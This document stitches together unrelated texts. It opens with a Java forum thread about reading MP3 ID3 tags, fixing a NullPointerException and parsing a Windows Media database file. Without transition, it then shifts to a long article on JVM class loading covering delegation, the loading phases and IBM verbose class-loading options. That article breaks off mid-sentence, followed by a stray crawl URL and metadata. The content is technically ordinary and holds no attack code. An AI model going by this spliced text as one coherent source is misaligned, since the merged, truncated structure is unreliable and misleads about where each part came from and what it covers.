System.out.println("Error ? " + e.toString()); } } } wow cheers for the quick response and the code. i'll have a mess around with it and then get back to you Thanks Hi, I recommend to use the JavaMusictag library: Java ID3 Tag Library Download the jar from here. You only need to add the jar to the class path and then you can write this very simple code: Code : public static void main(String[] args) throws IOException, TagException { File sourceFile = new File("C://song.mp3"); MP3File mp3file = new MP3File(sourceFile); ID3v1 tag = mp3file.getID3v1Tag(); System.out.println(tag.getAlbum()); System.out.println(tag.getAlbumTitle()); System.out.println(tag.getTitle()); } With this library you can handle specific tags version (ID3v1_1, ID3v2_4, etc). Also is really easy to create id3 tags. More info here: Introduction to tags (JavaPF I hope you don't be upset because I provide another solution) Thanks leandro, I will be sure to check that out as well. I'm open to all solutions! lol Thanks again lol leandro, of course I do not mind! The more solutions the better... I appear to be getting the following error whenever i try to run the program: Error ? java.lang.NullPointerException Basically i've copied the mp3 into the directory were the program is saved and then input the file name were it says File song = new File("."); Do you know why this is happening? The program itself doesn't bring up any errors when i build it, only when i run it. Thanks John You do not need to edit this code to include the file name, keep it the same and make sure the file is in the correct directory. Your Java workspace will contain a 'bin' and 'src' directory. Place your MP3 in the same place. I am currently at work so I cannot test this myself. Ahh right i see, got you now It worked, thanks On the subject i was also trying to print the content of a .wmdb (windows media database) file. This is basically a file used to store information about all the media that has been played using wmp. I read that .wmdb files also store some media metadata in the form of ID3 tags, however it doesn't appear so when viewing the file with notepad. The file appears to store it in what looks like html tags. For instance the following is some data taken from the file: < t r a c k > < W M C o n t e n t I D > 8 f 2 7 9 1 6 6 - 2 6 1 d - 4 a 9 f - 8 a f 1 - 3 b d 0 e a 7 e 3 d 0 5 < / W M C o n t e n t I D > < t r a c k T i t l e > S q u a r e O n e < / t r a c k T i t l e > < u n i q u e F i l e I D > A M G p _ i d = P 4 3 5 0 2 3 ; A M G t _ i d = T 7 7 3 2 1 6 9 < / u n i q u e F i l e I D > < t r a c k N u m b e r > 1 < / t r a c k N u m b e r > < t r a c k P e r f o r m e r > C o l d p l a y < / t r a c k P e r f o r m e r > < e x p l i c i t L y r i c s > 0 < / e x p l i c i t L y r i c s > < / t r a c k > The file however contains much more data than this, but the above is just an example of what you would expect to find. I hope i'm not bugging you guys with these questions, but i'm just curious how would i go about printing this data? Thanks John This looks a lot like XML. There is a tutorial on parsing XML here: But you might be able to read the file in line by line and manipulate the data.
http://www.javaprogrammingforums.com/%20java-theory-questions/335-parsing-id3-tags-mp3-printingthethread.html
CC-MAIN-2014-10
refinedweb
971
78.89
This a copy of the post I've just placed JModelica forum: I just wanted to share my experience building JModelica from source (trunk version) on Ubuntu 16.04. After several attempts, I think I've a quite streamlined procedure. Both commands "make install" and "make casadi_interface" are successful. In the end, I was also able to successfully run "make test" (although it took 58 min on the virtual machine). For most aspects, I've followed the user guide, but using updated versions of the dependencies (see after), in particular using Java 8 instead of 6 (not available anymore). My main departure from user guide is that I used Ipopt from Ubuntu instead of compiling from source, as recommended. This works well enough (functionally speaking, since I've no ideas about the performance). In the end, I think this approach is simpler/quicker (especially since it also saves from recompiling blas). However, I had to manually patch one Ipopt header for the compilation to work (but then this modification may not be needed when just using the JModelica binary). See below. It would be also interesting to try with Ipopt compiled from source, but for the moment I've no incentive to replace something that I just got to work! Dependency versions Here are the list of versions of the main dependencies (some packages, like g++, come already pre-installed with a fresh Ubuntu install): g++: 5.4.0 subversion: 1.9.3 gfortran: 5.4.0 cmake: 3.5.1 swig: 3.0.8 ant: 1.9.6 openjdk-8-jdk (8u91) , instead of openjdk-6 python-dev: 2.7.11 python-numpy: 1.11 python-scipy: 0.17 python-matplotlib: 1.5.1 cython: 0.23.4 python-lxml: 3.5.0 python-nose: 1.3.7 python-jpype: 0.5.4.2 (alternative: there is a fork JPype1, on PyP, which seems more up to dateI. not tested) zlib1g-dev: 1.2.8 libboost-dev: 1.58 jcc: 2.21 (from Ubuntu rather than from PyPI, as suggested in the user guide, since both versions are the same) extra : python-pip : 8.1.1 For ipython, I'm NOT using 2.4.1 from Ubuntu, but rather 5.1 from PyPI (pip install) Also, for using Ipopt from Ubuntu, ipopt + some extra headers are needed: coinor-libipopt1v5: 3.11.9 coinor-libipopt-dev: 3.11.9 libblas-dev: 3.6.0 liblapack-dev: 3.6.0 Patching Ubuntu's Ipopt header As I said, I had to patch one Ipopt header. The starting point is this compilation error in the "make install" before the patch: libtool: compile: g++ -DHAVE_CONFIG_H -I. -I../../../JMI/src -I../.. -Wall -I/usr/include/coin -DJMI_AD=JMI_AD_NONE -g -I/home/modelica/JModelica_trunk/build/sundials_install/include -fPIC -g -O2 -MT libjmi_solver_la-jmi_opt_coll_ipopt.lo -MD -MP -MF .deps/libjmi_solver_la-jmi_opt_coll_ipopt.Tpo -c ../../../JMI/src/jmi_opt_coll_ipopt.cpp -fPIC -DPIC -o .libs/libjmi_solver_la-jmi_opt_coll_ipopt.o In file included from /usr/include/coin/IpJournalist.hpp:15:0, from /usr/include/coin/IpIpoptApplication.hpp:26, from ../../../JMI/src/jmi_opt_coll_ipopt.cpp:21: /usr/include/coin/IpSmartPtr.hpp:18:4: error: #error "don't have header file for stddef" # error "don't have header file for stddef" ^ Makefile:1240: recipe for target 'libjmi_solver_la-jmi_opt_coll_ipopt.lo' failed make[1]: *** [libjmi_solver_la-jmi_opt_coll_ipopt.lo] Error 1 make[1]: Leaving directory '/home/modelica/JModelica_trunk/build/JMI/src' Makefile:417: recipe for target 'install-recursive' failed make: *** [install-recursive] Error 1 So the error comes from line 18 in IpSmartPtr.hpp, in the /usr/include/coin/ directory. I've modified this line by taking inspiration from similar line in IpJournalist.hpp (I don't remember the source of this idea, because I did this back in April. Sorry if I forgot to credit some other source). So I changed line 18 of IpSmartPtr.hpp to remove the error and instead force inclusion of <cstdarg>, as done in IpJournalist.hpp. This is the line after modification (with my initials to remember that this is a dirty patched line, but the rest of the comment really comes from IpJournalist.hpp ) # include <cstdarg> // if this header is included by someone who does not define HAVE_CSTDARG or HAVE_STDARG, let's hope that cstdarg is available. PH 2016-09 Now with this modification, I think somebody else should be able to reproduce the build. Summary of the commands This list of commands are just adapted from the user guide. Only the include path for Ipopt is specific (using Ubuntu package). Install directory: $ mkdir /home/modelica/Programmes/JModelica in the source tree: $ mkdir build $ cd build/ $ ../configure --prefix=/home/modelica/Programmes/JModelica --with-ipopt=/usr $ make install then casadi interface $ make casadi_interface → should just work! One thought on “Installing JModelica on Ubuntu 16.04” mentioned this blogpost here
https://pierreh.eu/installing-jmodelica-on-ubuntu-16-04/
CC-MAIN-2020-29
refinedweb
796
52.15
Next Tutorial: Using a cv::cuda::GpuMat with thrust In the Video Input with OpenCV and similarity measurement tutorial I already presented the PSNR and SSIM methods for checking the similarity between the two images. And as you could see, the execution process takes quite some time , especially in the case of the SSIM. However, if the performance numbers of an OpenCV implementation for the CPU do not satisfy you and you happen to have an NVIDIA CUDA GPU device in your system, all is not lost. You may try to port or write your owm algorithm for the video card. This tutorial will give a good grasp on how to approach coding by using the GPU module of OpenCV. As a prerequisite you should already know how to handle the core, highgui and imgproc modules. So, our main goals are: You may also find the source code and the video file in the samples/cpp/tutorial_code/gpu/gpu-basics-similarity/gpu-basics-similarity directory of the OpenCV source library or download it from here. The full source code is quite long (due to the controlling of the application via the command line arguments and performance measurement). Therefore, to avoid cluttering up these sections with those you'll find here only the functions itself. The PSNR returns a float number, that if the two inputs are similar between 30 and 50 (higher is better). The SSIM returns the MSSIM of the images. This is too a floating point number between zero and one (higher is better), however we have one for each channel. Therefore, we return a Scalar OpenCV data structure: As see above, we have three types of functions for each operation. One for the CPU and two for the GPU. The reason I made two for the GPU is too illustrate that often simple porting your CPU to GPU will actually make it slower. If you want some performance gain you will need to remember a few rules, for which I will go into detail later on. The development of the GPU module was made so that it resembles as much as possible its CPU counterpart. This makes the porting process easier. The first thing you need to do before writing any code is to link the GPU module to your project, and include the header file for the module. All the functions and data structures of the GPU are in a gpu sub namespace of the cv namespace. You may add this to the default one via the use namespace keyword, or mark it everywhere explicitly via the cv:: to avoid confusion. I'll do the later. GPU stands for "graphics processing unit". It was originally built to render graphical scenes. These scenes somehow build on a lot of data. Nevertheless, these aren't all dependent one from another in a sequential way and as it is possible a parallel processing of them. Due to this a GPU will contain multiple smaller processing units. These aren't the state of the art processors and on a one on one test with a CPU it will fall behind. However, its strength lies in its numbers. In the last years there has been an increasing trend to harvest these massive parallel powers of the GPU in non-graphical scenes; rendering as well. This gave birth to the general-purpose computation on graphics processing units (GPGPU). The GPU has its own memory. When you read data from the hard drive with OpenCV into a Mat object that takes place in your systems memory. The CPU works somehow directly on this (via its cache), however the GPU cannot. It has to transfer the information required for calculations from the system memory to its own. This is done via an upload process and is time consuming. In the end the result will have to be downloaded back to your system memory for your CPU to see and use it. Porting small functions to GPU is not recommended as the upload/download time will be larger than the amount you gain by a parallel execution. Mat objects are stored only in the system memory (or the CPU cache). For getting an OpenCV matrix to the GPU you'll need to use its GPU counterpart cv::cuda::GpuMat. It works similar to the Mat with a 2D only limitation and no reference returning for its functions (cannot mix GPU references with CPU ones). To upload a Mat object to the GPU you need to call the upload function after creating an instance of the class. To download you may use simple assignment to a Mat object or use the download function. Once you have your data up in the GPU memory you may call GPU enabled functions of OpenCV. Most of the functions keep the same name just as on the CPU, with the difference that they only accept GpuMat inputs. Another thing to keep in mind is that not for all channel numbers you can make efficient algorithms on the GPU. Generally, I found that the input images for the GPU images need to be either one or four channel ones and one of the char or float type for the item sizes. No double support on the GPU, sorry. Passing other types of objects for some functions will result in an exception throw, and an error message on the error output. The documentation details in most of the places the types accepted for the inputs. If you have three channel images as an input you can do two things: either add a new channel (and use char elements) or split up the image and call the function for each image. The first one isn't really recommended as this wastes memory. For some functions, where the position of the elements (neighbor items) doesn't matter, the quick solution is to reshape it into a single channel image. This is the case for the PSNR implementation where for the absdiff method the value of the neighbors is not important. However, for the GaussianBlur this isn't an option and such need to use the split method for the SSIM. With this knowledge you can make a GPU viable code (like mine GPU one) and run it. You'll be surprised to see that it might turn out slower than your CPU implementation. The reason for this is that you're throwing out on the window the price for memory allocation and data transfer. And on the GPU this is damn high. Another possibility for optimization is to introduce asynchronous OpenCV GPU calls too with the help of the cv::cuda::Stream. On an Intel P8700 laptop CPU paired with a low end NVIDIA GT220M, here are the performance numbers: In both cases we managed a performance increase of almost 100% compared to the CPU implementation. It may be just the improvement needed for your application to work. You may observe a runtime instance of this on the YouTube here.
https://docs.opencv.org/4.4.0/dd/d3d/tutorial_gpu_basics_similarity.html
CC-MAIN-2022-33
refinedweb
1,166
70.02
In this article I will show you how to create a simple Visual Studio 2008 AppWizard. The AppWizard I will create will set up a basic OpenGL Application. This AppWizard has only one configurable property, which decides whether the axies and grid are rendered. However, once you've gone though this code you should be able to add properties of your own! My most basic OpenGL Application, called 'OpenGLApplication', which you can download from the link at the top of the page, was the source for the AppWizard. The purpose of the AppWizard is to spit out projects that look very similar to this application. I have been coding OpenGL for years but have never bothered with an AppWizard - there just seems to be too little information on the web. I finally bit the bullet and decided to dive in. This is the first version of the code, so please leave plenty of comments if there are any problems - I will update the code regularly. The application itself is very simple - it is an MFC application WITHOUT the document / view architecture. In reality this means there simply isn't a document - there is still a view. The OpenGL part of the code is quite a few years old now. There are three classes which enable OpenGL: CDIBSurface - This is a class that enables rendering to a DIB surface. COpenGLSurface - Derived from the CDIBSurface, this simply controls a render context. COpenGLView - This is a CView derived class. It contains a COpenGLSurface. This is rendered to by OpenGL calls and blitted to the screen in the OnDraw function. CDIBSurface COpenGLSurface COpenGLView By overriding the DoOpenGLDraw and DoOpenGLResize functions you can render using OpenGL and set up the viewport. This original OpenGL Application is available to download if you'd like to look at it. DoOpenGLDraw DoOpenGLResize Create a new Visual C++ AppWizard project. In my original project I chose to create five property pages - this was rather optimistic and I soon reduced it to one! Now the first thing to do is to make a copy of all of the files that you are going to include in your new project. Everything from my OpenGLApplication project in my case. Copy all of these files into the Template Files folder. Then add them to the project. The template files are the files that will be added to any project based on this AppWizard. Now open up the 'Templates.inf' file and make sure that all of the files are listed, like this: readme.txt ChildView.cpp ChildView.h DIBSurface.cpp DIBSurface.h MainFrm.cpp MainFrm.h OpenGLApplication.cpp OpenGLApplication.h OpenGLApplication.rc OpenGLSurface.cpp OpenGLSurface.h OpenGLView.cpp OpenGLView.h Resource.h stdafx.cpp stdafx.h targetver.h res\OpenGLApplication.ico res\OpenGLApplication.rc2 res\Toolbar.bmp This is a fairly standard set of files for an MFC project. By the time that you have done this you are ready for the first test. Compule the project and open up a new instance of Visual Studio. Create a new project based on the AppWizard. It should successfully create the project and copy all of the template files to it. Immediate problem number one - we don't have a header files or resource files folder. Let's sort this now - first of all we're going to open up the default.htm file and find the 'SOURCE_FILTER' string. Let's add some lines: <SYMBOL NAME='SOURCE_FILTER' TYPE=text</SYMBOL> <SYMBOL NAME='HEADER_FILTER' TYPE=text</SYMBOL> <SYMBOL NAME='RESOURCE_FILTER' TYPE=text </SYMBOL> Here we're defining what folders we'll have in the new project - and what types of files will go into them. We're not quite done yet though, open up the default.js file and find the AddFilters function - make it look like this: AddFilters function AddFilters(proj) { try { // Add the Source Files group and set the filter. var group = proj.Object.AddFilter('Source Files'); group.Filter = wizard.FindSymbol('SOURCE_FILTER'); // Add the Header Files group and set the filter. var group = proj.Object.AddFilter('Header Files'); group.Filter = wizard.FindSymbol('HEADER_FILTER'); // Add the Source Files group and set the filter. var group = proj.Object.AddFilter('Resource Files'); group.Filter = wizard.FindSymbol('RESOURCE_FILTER'); } catch(e) { throw e; } } This is all we need to create the correct folders and automatically put the correct files into them. Build the project and create a new project based on this AppWizard - you should now see that the files are in folders just like in the original app. In the set of files shown above, we're going to want a few of them to be name after the project. For example, the View class will want file names like MyNewProjectView.h and MyNewProjectView.cpp rather than simply OpenGLApplicationView. We're going to delve into the default.js file to handle this. Let's look at the GetTargetName function. View GetTargetName function GetTargetName(strName, strProjectName) { try { // Here we can create custom filenames. var strTarget = strName; if (strName == 'readme.txt') strTarget = 'ReadMe.txt'; // The ChildView class becomes the ProjectNameView class. if (strName == 'ChildView.cpp') strTarget = strProjectName + 'View.cpp'; if (strName == 'ChildView.h') strTarget = strProjectName + 'View.h'; // The COpenGLApplication class becomes the ProjectNameApp // class (but no 'App' in the headers!). if (strName == 'OpenGLApplication.cpp') strTarget = strProjectName + '.cpp'; if (strName == 'OpenGLApplication.h') strTarget = strProjectName + '.h'; if (strName == 'OpenGLApplication.rc') strTarget = strProjectName + '.rc'; if (strName == 'res\\OpenGLApplication.rc2') strTarget = 'res\\' + strProjectName + '.rc2'; if (strName == 'res\\OpenGLApplication.ico') strTarget = 'res\\' + strProjectName + '.ico'; return strTarget; } catch(e) { throw e; } } So what's going on here? Well for every file that gets put into the newly created project we can use this function to modify the name. By checking for the OpenGLApplication.cpp file for example, we can make the filename MyNewProject.cpp or whatever we want. But now we have a new problem - what about everywhere where we've used '#include "OpenGLApplication.h"'? We need to find every instance in the source files where we have replaced part of a filename with the project name and update it like so, here's before: #include "stdafx.h" #include "OpenGLApplication.h" #include "MainFrm.h" And here is the code after: #include "stdafx.h" #include "[!output PROJECT_NAME].h" #include "MainFrm.h" The [!output PROJECT_NAME] is replaced with the project name that the user has chosen. This is where things start to get tricky - my AppWizard for example changes the name of six files. It also changes the name of two classes - like this: [!output PROJECT_NAME] class C[!output PROJECT_NAME]View : public COpenGLView { public: // Constructor / Destructor. C[!output PROJECT_NAME]View(); virtual ~C[!output PROJECT_NAME]View(); So you have to go through your code in the Template Files folder with a fine-toothed comb and make sure you've updated everything correctly! If you're changing resource files like icons as well, you'll need to look through the rc and maybe even rc2 file! A good thing to do here is have another instance of Visual Studio open at the same time and keep on trying to build the project. Don't worry too much about odd linker errors just yet - just make sure there's nothing blazingly obviously wrong in the generated code. Now we come to the next problem - the project won't build. For one thing it doesn't know to link to OpenGL32.lib and glu32.lib - but further investigation shows that the build parameters are all at their default - no MFC, no debug info, no nothing! Look at the AddConfig function in default.js. This is where you can change the build configurations. Let's make it look like this: AddConfig function AddConfig(proj, strProjectName) { try { // Create the debug settings. var config = proj.Object.Configurations('Debug'); config.IntermediateDirectory = '$(ConfigurationName)'; config.OutputDirectory = '$(SolutionDir)$(ConfigurationName)'; config.CharacterSet = charSet.charSetUnicode; config.useOfMfc = useOfMfc.useMfcDynamic; // Compiler..MinimalRebuild = true; CLTool.BasicRuntimeChecks = basicRuntimeCheckOption.runtimeBasicCheckAll; CLTool.WarningLevel = warningLevelOption.warningLevel_3; CLTool.PreprocessorDefinitions = "WIN32;_WINDOWS;_DEBUG"; CLTool.DebugInformationFormat = debugEditAndContinue; CLTool.Optimization = optimizeDisabled; CLTool.RuntimeLibrary = runtimeLibraryOption.rtMultiThreadedDebugDll; // Add linker dependencies. var LinkTool = config.Tools('VCLinkerTool'); LinkTool.AdditionalDependencies = "opengl32.lib glu32.lib"; LinkTool.LinkIncremental = linkIncrementalType.linkIncrementalYes; LinkTool.GenerateDebugInformation = true; LinkTool.ProgramDatabaseFile = "$(TargetDir)$(TargetName).pdb"; LinkTool.SubSystem = subSystemOption.Windows; // Create the release settings. config = proj.Object.Configurations('Release'); config.IntermediateDirectory = '$(ConfigurationName)'; config.OutputDirectory = '$(SolutionDir)$(ConfigurationName)'; config.CharacterSet = charSet.charSetUnicode; config.useOfMfc = useOfMfc.useMfcDynamic; // Compiler - set the precompiled header settings..WarningLevel = warningLevelOption.warningLevel_3; CLTool.Optimization = optimizeOption.optimizeMaxSpeed; CLTool.EnableIntrinsicFunctions = true; CLTool.PreprocessorDefinitions = "WIN32;_WINDOWS;NDEBUG"; CLTool.RuntimeLibrary = runtimeLibraryOption.rtMultiThreadedDll; // Add linker dependencies. var LinkTool = config.Tools('VCLinkerTool'); LinkTool.AdditionalDependencies = "opengl32.lib glu32.lib"; LinkTool.LinkIncremental = linkIncrementalType.linkIncrementalNo; LinkTool.SubSystem = subSystemOption.Windows; } catch(e) { throw e; } } What a pain. After much experimenting this should set up the compile and link in debug and release perfectly. Test the AppWizard again - you should be able to build and run the project now. By this point the App Wizard should be working - in the sense that it generates a working application. It is now up to you to go though the TODOs in the code and put in your AppWizard name, description and so on. You can change images as well. The last thing that I did was change the 'Example 1 Checkbox' that was generated by the AppWizard to 'Render Grid and Axies'. The symbol for it was changed to CHECKBOX_EXAMPLE_RENDERING. This can be used conditionally in the code, as in the ChildView.cpp file below: CHECKBOX_EXAMPLE_RENDERING void C[!output PROJECT_NAME]View::DoOpenGLDraw() { [!if CHECKBOX_EXAMPLE_RENDERING] // Here we'll do a little bit of example rendering, by drawing a cube. // Set the clear colour to black and clear the colour buffer. glClearColor(0, 0, 0, 1); // ...etc etc... [!else] // Do your OpenGL drawing here. Don't forget to call glFlush at the end! [!endif] } Nothing too clever here, depending on the state of the checkbox we'll either get some example drawing code, or just a comment reminding the user to add their own. This is fairly straightforward, but there is not much good documentation for AppWizards, especially for Visual Studio .NET 2008. At this early stage you may well find problems with this code on different machines - but let me know and I will fix them as they crop up. It'll take a while to update the code on the CodeProject. Until then, I have put a small page on one of my websites to store this code - so updates will be available from SharpGL - Other Resources before they are online at the CodeProject. 14th January 2009 - First revision of the article written.
http://www.codeproject.com/Articles/32575/OpenGL-MFC-AppWizard?fid=1533755&df=90&mpp=10&sort=Position&spc=None&select=2893448&tid=2893345
CC-MAIN-2014-10
refinedweb
1,745
51.95
- Published on Passwordless email authentication with Next.js using NextAuth.js - Authors - Name - Andreas Keller - @itsakeller NextAuth.js is an extremly well done authentication library for Next.js apps with built in support for many popular services (Google, Facebook, Auth0, ...) and passwordless Email signin which we will setup in this article. We will be building a Next.js app with a protected members area using NextAuth.js with passwordless email authentication and MongoDB to store the user accounts. For sending Email we will set up Mailtrap.io. Setting up MongoDB We create a MongoDB database on MongoDB Atlas following these instructions. Create new Next.js app with MongoDB We create our app based on the with-mongodb starter: npx create-next-app --example with-mongodb nextjs-mongodb # or yarn create next-app --example with-mongodb nextjs-mongodb We then copy the .env.local.example file to .env.local and need to provide the two environment variables MONGODB_URI and MONGODB_DB with our info from the previous step. If we are successfull we should see You are connected to MongoDB after starting our app and opening in our browser. Add next-auth as a dependency Next we need to install next-auth. yarn add next-auth After installing next-auth we need to create the file api/auth/[...nextauth].js inside our pages folder. NextAuth.js uses a Next.js catch-all-route for its endpoints. In this file all the configuration for NextAuth.js is setup. We want to use NextAuth.js with passwordless authentication, so we setup its Email provider: import NextAuth from "next-auth"; import Providers from "next-auth/providers"; const options = { database: process.env.MONGODB_URI, providers: [ Providers.Email({ server: { host: process.env.EMAIL_SERVER_HOST, port: process.env.EMAIL_SERVER_PORT, auth: { user: process.env.EMAIL_SERVER_USER, pass: process.env.EMAIL_SERVER_PASSWORD, }, }, from: process.env.EMAIL_FROM, }), ] }; export default (req, res) => NextAuth(req, res, options); As you can see from the configuration we need to set a couple environment variables. For our production app we will need an email service like Postmark or SendGrid to send our emails. But a great option for our development environment is Mailtrap, an email sandbox service. Sign up and get yourself a demo inbox. Then copy the credentials into .env.local. For NextAuth.js to work properly we need to create a custom _app.js. import { Provider } from "next-auth/client"; function MyApp({ Component, pageProps }) { return ( <Provider session={pageProps.session}> <Component {...pageProps} /> </Provider> ); } export default MyApp; You need to configure a database for the Email provider. We pass our MONGODB_URI connection string to the databaseconfiguration option. Lastly NextAuth.js needs another environment variables. Add NEXTAUTH_URL= to .env.local. MongoDB peerOptionalDependencies issue You might need to add peerOptionalDependencies to your package.json file if you experience issues. See NextAuth.js issue 552 for more info. "peerOptionalDependencies": { "mongodb": "^3.5.9" } Testing authentication flow With this setup we can already test our passwordless authentication flow. Open localhost:3000/api/auth/signin to get started. After entering your email and submitting the form you should get a confirmation that a sign in link has been sent to your email address. Go to your inbox (in our case Mailtrap inbox) and click the link in the email. After clicking Sign in you should be redirected to localhost:3000. Next step is verifying that we are actually signed in. Verifying user is signed in The useSession() React Hook in the NextAuth.js client is the easiest way to check if someone is signed in. In our pages/index.js we import the useSession() hook and invoke it to get the current session. ... import { useSession } from "next-auth/client"; export default function Home({ isConnected }) { const [session, loading] = useSession(); return ( <div className="container"> <Head> <title>Create Next App</title> <link rel="icon" href="/favicon.ico" /> </Head> {session && ( <> <p>Signed in as {session.user.email}</p> </> )} {!session && ( <p> <a href="/api/auth/signin">Sign in</a> </p> )} ... After signing in we should see our email address at the top of the page. Customizing sign in page NextAuth.js automatically creates simple, unbranded authentication pages for handling Sign in, Sign out, Email Verification and displaying error messages. The options displayed on the sign up page are automatically generated based on the providers specified in the options passed to NextAuth.js. To add a custom sign in page, we can use the pages option: ... pages: { signIn: "/signin", } ... Adding TailwindCSS To style our custom sign in page we use TailwindCSS. They have a great guide on how to install TailwindCSS with Next.js. If you create a custom sign in form, you will need to submit both the email address and csrfToken from /api/auth/csrf in a POST request to /api/auth/signin/email. import { csrfToken } from "next-auth/client"; export default function SignIn({ csrfToken }) { return ( <div className="h-screen bg-gray-100 flex flex-col"> <div className="mt-8 mx-4 sm:mx-auto sm:w-full sm:max-w-md"> <div className="text-center mt-24"> <h2 className="mt-6 text-center text-3xl font-extrabold text-gray-900"> Sign in </h2> </div> <div className="mt-8 bg-white py-8 px-4 shadow-lg rounded-lg sm:px-10"> <form method="post" action="/api/auth/signin/email"> <input name="csrfToken" type="hidden" defaultValue={csrfToken} /> <label className="block font-semibold text-sm text-gray-900"> Email address <input className="mt-2 appearance-none block w-full px-3 py-2 border border-gray-300 rounded-md shadow-sm placeholder-gray-400 focus:outline-none focus:ring-blue-500 focus:border-blue-500 sm:text-sm" type="text" id="email" name="email" placeholder="you@company.com" /> </label> <button className="mt-2 w-full flex justify-center py-2 px-4 border border-transparent rounded-md shadow-sm text-sm font-medium text-white bg-blue-600 hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-blue-500" type="submit" > Sign in with Email </button> </form> </div> </div> </div> ); } export async function getServerSideProps(context) { return { props: { csrfToken: await csrfToken(context), }, }; } Similarly we can customize the confirmation page after the email has been sent. ... pages: { signIn: "/signin", verifyRequest: "/verify-request", } ... export default function VerifyRequest() { return ( <div className="h-screen bg-gray-100 flex flex-col"> <div className="mt-8 mx-4 sm:mx-auto sm:w-full sm:max-w-lg"> <div className="text-center mt-24"> <h2 className="mt-6 text-center text-3xl font-extrabold text-gray-900"> Email Sent </h2> </div> <div className="mt-8 bg-white py-8 px-4 shadow-lg rounded-lg sm:px-10"> <p className="font-medium mb-4 text-xl"> Please check your inbox for your sign in link. </p> Sometimes this can land in SPAM! While we hope that isn't the case if it doesn't arrive in a minute or three, please check. </div> </div> </div> ); } Summary We have now successfully added passwordless email authentication to our Next.js app with NextAuth.js and customized our sign in and email sent pages. You could further customize the sign in email or add additional properties to the user account like roles. I'm writing a book on how to build a content aggregator website with Next.js, MongoDB & Tailwind CSS. Subscribe to follow along.
https://andreaskeller.name/blog/nextjs-passwordless-email-auth
CC-MAIN-2022-33
refinedweb
1,212
50.94
0 Im trying to write a program thats uses call function, but for some reason the program. Can someone help point out what i might be missing in the code? #include <iostream> #include <cmath> using namespace std; void timeoffall(); void velatimpact(); int main () { double h; cout << "Please enter the height from which the ball was dropped" << endl; cin >> h; timeoffall(); velatimpact(); return 0; } void timeoffall(double h) { double timeoffall; timeoffall = sqrt (h/4.9); cout << "the ball was in the air for " << timeoffall << "seconds" <<endl; } void velatimpact(double timeoffall) { double velatimpact; velatimpact = (-9.8 * timeoffall); cout << "the velocity at impact was: " << velatimpact << "m/s" << endl; }
https://www.daniweb.com/programming/software-development/threads/231532/using-call-functions
CC-MAIN-2018-39
refinedweb
105
59.84
8.13. Encoder-Decoder Architecture¶ The encoder-decoder architecture is a neural network design pattern. In this architecture, the network is partitioned into two parts, the encoder and the decoder. The encoder’s role is encoding the inputs into state, which often contains several tensors. Then the state is passed into the decoder to generate the outputs. In machine translation, the encoder transforms a source sentence, e.g. “Hello world.”, into state, e.g. a vector, that captures its semantic information. The decoder then uses this state to generate the translated target sentence, e.g. “Bonjour le monde.”. Fig. 8.17 The encoder-decoder architecture. In this section, we will show an interface to implement this encoder-decoder architecture. In [1]: from mxnet.gluon import nn 8.13.1. Encoder¶ The encoder is a normal neural network that takes inputs, e.g. a source sentence, to return outputs. In [2]: class Encoder(nn.Block): def __init__(self, **kwargs): super(Encoder, self).__init__(**kwargs) def forward(self, X): raise NotImplementedError 8.13.2. Decoder¶ The decoder has an additional method init_state to parse the outputs of the encoder with possible additional information, e.g. the valid lengths of inputs, to return the state it needs. In the forward method, the decoder takes both inputs, e.g. a target sentence, and the state. It returns outputs, with potentially modified state if the encoder contains RNN layers. In [3]: class Decoder(nn.Block): def __init__(self, **kwargs): super(Decoder, self).__init__(**kwargs) def init_state(self, enc_outputs, *args): raise NotImplementedError def forward(self, X, state): raise NotImplementedError 8.13.3. Model¶ The encoder-decoder model contains both an encoder an decoder. We implement its forward method for training. It takes both encoder inputs and decoder inputs, with optional additional information. During computation, it first compute encoder outputs to initialize the decoder state, and then returns the decoder outputs. In [4]: class EncoderDecoder(nn.Block): def __init__(self, encoder, decoder, **kwargs): super(EncoderDecoder, self).__init__(**kwargs) self.encoder = encoder self.decoder = decoder def forward(self, enc_X, dec_X, *args): enc_outputs = self.encoder(enc_X) dec_state = self.decoder.init_state(enc_outputs, *args) return self.decoder(dec_X, dec_state)
http://d2l.ai/chapter_recurrent-neural-networks/encoder-decoder.html
CC-MAIN-2019-18
refinedweb
358
54.39
Class: - Cache - Parent - Self A class loader first determines if it has been asked to load this same class in the past. If so, it returns the same class it returned last time (that is, the class stored in the cache). If not, it gives its parent a chance to load the class. These two steps repeat recursively and depth first. If the parent returns null (or throws a ClassNotFoundException), then the class loader searches its own path for the source of the class.: Figure 1. The class loader delegation model: Figure 2. The phases of class loading: - Bytecode verification. The class loader does a number of checks on the bytecodes of the class to ensure that it is well formed and well behaved. - Class preparation. This stage prepares the necessary data structures that represent fields, methods, and implemented interfaces that are defined within each class. - Resolving. In this stage, the class loader loads all the other classes referenced by a particular class. The classes can be referenced in a number of ways: - Superclasses - Interfaces - Fields - Method signatures - Local variables used in methods During the initializing phase, any static initializers contained within a class are executed. At the end of this phase, static fields are initialized to their default values.: cl.loadClass()(where clis an instance of java.lang.ClassLoader) Class.forName()(the starting class loader is the defining class loader of the current class) When one of these methods is invoked, the class whose name is specified as an argument is loaded by the class loader. If the class is already loaded, then a reference is simply returned; otherwise, the loader goes through the delegation model to load the class.. Classes are often loaded through a combination of explicit and implicit class loading. For example, a class loader could first load a class explicitly and then load all of its referenced classes implicitly. Debugging features of the JVM The previous section introduced the fundamental principles of class loading. This section covers the variety of features built into the IBM JVM to assist debugging. Other JVMs may have similar debugging features available; refer to the appropriate documentation for details. You can turn on the IBM JVM's verbose output by using the -verbose command-line option. Verbose output displays information on the console when certain events occur -- when a class has been loaded, for instance. For additional class loading information, you can use verbose class output. This is activated using the -verbose:class option. Interpreting verbose output Verbose output lists all the JAR files that have been opened and includes the full path to those JARs. Here's an example: All the classes that are loaded are listed, along with the JAR file or directory from which they were loaded. For example: Verbose class output shows additional information, such as when superclasses are being loaded, and when static initializers are being run. Some example output follows: Verbose output also shows some internally thrown exceptions (if they occur), including the stack trace. Resolving problems using -verbose Verbose output can help to solve classpath problems, such as JAR files not being opened (and therefore not on the classpath) and classes being loaded from the wrong place. IBM Verbose Class Loading It is often useful to know where class loaders look for classes and which class loader loads a particular class. You can obtain this information using the IBM Verbose Class Loading command-line option: -Dibm.cl.verbose=<class name>. You can use regular expressions to declare the name of the class; for instance, Hello* traces any classes with names starting with Hello. This option also works on user-defined class loaders, as long as they directly or indirectly extend java.net.URLClassLoader. Interpreting IBM Verbose Class Loading output IBM Verbose Class Loading output shows the class loaders that attempt to load the specified class and the locations in which they look. For example, imagine we used the following command line: Here, MainClass references 